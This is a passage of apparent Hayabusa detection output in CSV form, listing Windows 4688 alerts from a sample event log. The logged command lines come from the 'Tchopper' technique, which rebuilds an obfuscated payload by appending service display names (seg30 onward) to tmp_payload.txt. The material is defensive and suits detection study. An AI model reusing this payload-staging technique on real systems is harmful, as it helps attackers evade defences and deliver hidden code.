+00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg30"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6a4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:10.236 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg30"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x964 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:10.236 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:11.689 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg31"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xcfc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:11.689 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg31"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:11.689 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:13.147 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg32"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xad8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:13.147 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg32"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x990 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:13.147 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:14.607 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg33"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xde8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:14.623 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg33"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x944 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:14.623 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:16.065 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg34"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x4a8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:16.080 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg34"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa14 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:16.080 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:17.549 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg35"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6fc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:17.565 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg35"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x474 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:17.565 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:19.048 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg36"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6b8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:19.048 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg36"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xafc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:19.048 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:20.564 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg37"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf00 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:20.564 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg37"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa80 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:20.564 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:22.050 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg38"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:22.050 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg38"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xec4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:22.050 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:23.508 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg39"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xbe8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:23.508 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg39"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf1c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:23.508 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:24.966 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg40"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x254 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:24.966 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg40"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x580 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:24.966 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:26.426 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg41"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xba4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:26.426 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg41"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa60 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:26.426 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:27.882 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg42"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x2ac | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:27.882 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg42"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa6c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:27.882 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:29.330 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg43"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdd8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:29.346 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg43"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x964 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:29.346 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:30.829 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg44"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:30.829 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg44"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcfc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:30.829 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:32.282 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg45"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc6c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:32.282 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg45"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x22c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:32.282 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:33.739 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg46"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xee8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:33.739 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg46"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb70 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:33.739 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:35.192 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg47"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x748 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:35.208 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg47"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x8f4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:35.208 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:36.629 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg48"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xca4 | User: FS03$ | LID: 